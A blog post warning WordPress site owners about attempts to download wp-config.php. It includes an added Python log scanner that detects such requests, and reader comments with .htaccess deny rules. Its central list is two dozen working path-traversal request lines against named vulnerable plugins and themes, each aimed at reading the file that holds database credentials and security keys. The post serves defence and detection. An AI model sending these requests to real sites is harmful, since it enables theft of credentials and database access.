wp-config.php exploit attempts

I got a whole bunch of new exploit attempts this weekend. I’ve added these to the 6.00 Stop Spammer plugin so I should be protected.

The exploit uses insecure plugins and themes to try to download your wp-config file. The file has your security keys and database user and password, so there is potentially some significant stuff there.

Watch out for these:

/wp-content/force-download.php?file=../wp-config.php HTTP/1.1
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php HTTP/1.1
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1
/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/Newspapertimes_1/download.php?filename=../../../wp-config.php HTTP/1.1
/wp-content/themes/SMWF/inc/download.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1
/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php HTTP/1.1
/wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/jarida/download.php?uri=../../../wp-config.php HTTP/1.1
/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1
/wp-content/themes/markant/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1
/wp-content/themes/tess/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/yakimabait/download.php?file=../../../wp-config.php HTTP/1.1
/wp-content/themes/ypo-theme/download.php?download=../../../wp-config.php HTTP/1.1
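
One way to spot these requests in an access log without keeping a list of every vulnerable script, as an added example that is not part of the original post or of the Stop Spammer plugin: it flags any request whose query parameter climbs directories and ends at wp-config.php, including URL-encoded forms. The function names, the combined log format and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SENSITIVE = ("wp-config.php",)  # assumption: extend with other files you protect
MAX_DECODE_ROUNDS = 3           # extra rounds to undo repeated URL encoding

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/felis/download.php?file=../../../wp-config.php HTTP/1.1" 404 162',
    '192.0.2.11 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/force-download.php?file=..%2F..%2Fwp-config.php HTTP/1.1" 404 162',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/themes/felis/download.php?file=brochure.pdf HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Jan/2024:10:02:00 +0000] "GET /blog/?s=editing+wp-config.php HTTP/1.1" 200 900',
]


def fully_decode(value):
    """Percent-decode until stable (parse_qsl has already decoded once)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/").lower()


def traversal_params(target):
    """Return [(param, decoded_value)] for query parameters that climb
    directories and end at a sensitive file."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        # Ignore anything after a NUL byte, as a file API that stops at NUL would.
        if "../" in value and value.split("\x00")[0].rstrip("/").endswith(SENSITIVE):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (client_ip, script_path, param) for each suspicious request."""
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        for name, _ in traversal_params(target):
            yield line.split(" ", 1)[0], urlsplit(target).path, name
```

Calling `list(scan(SAMPLE_LOG))` reports the first two sample lines and ignores the legitimate download and the search for the file name.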

 

3 Responses to “wp-config.php exploit attempts”

  1. mreshane says:

    My server didn’t allow .htaccess, I’m using nginx (a newbie here). How to change this other than .htaccess?

  2. Ward says:

    Just noticed this did not paste correctly:

    Order deny,allow

    #add my management IP address
    allow from x.y.z.n
    Deny from all

    Allow from all

  3. Ward says:

    Try a .htaccess file in the wp-content file. .php should never be served from wp-content and below, only content: images, js, css, and others…

    Order deny,allow

    Deny from all

    Allow from all
